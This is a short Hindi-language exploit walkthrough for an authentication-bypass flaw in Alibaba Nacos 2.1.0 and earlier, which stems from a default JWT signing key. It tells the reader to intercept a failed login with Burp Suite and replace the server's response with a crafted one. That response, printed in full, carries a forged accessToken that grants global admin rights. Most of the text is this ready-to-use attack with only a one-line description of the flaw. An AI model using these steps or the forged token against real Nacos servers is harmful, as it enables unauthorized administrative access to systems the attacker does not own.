
Alibab Nacos Unauthorized Login
Nacos <= 2.1.0 को प्रभावित करने वाली एक समस्या खोजी गई है। Nacos उपयोगकर्ता डिफ़ॉल्ट JWT कुंजी का उपयोग करते हैं, जिससे एक अनधिकृत पहुँच भेद्यता उत्पन्न होती है। इस भेद्यता के माध्यम से, हमलावर उपयोगकर्ता नाम और पासवर्ड प्रमाणीकरण को बायपास कर सकते हैं और सीधे Nacos उपयोगकर्ता में लॉग इन कर सकते हैं।
Nacos <= 2.1.0 संस्करण
चरण 1:सीधे Nacos वेबसाइट पर जाएं, कोई भी उपयोगकर्ता नाम और पासवर्ड भरें और पैकेट कैप्चर करने के लिए Burpsuite का उपयोग करें।

चरण 2:प्रतिक्रिया पैकेट को इंटरसेप्ट करें।

चरण 3: डेटा पैकेट को निम्नानुसार संशोधित करें
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb
{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

चरण 4: डेटा पैकेट को रिलीज़ करने के बाद सफलतापूर्वक लॉग इन करें।
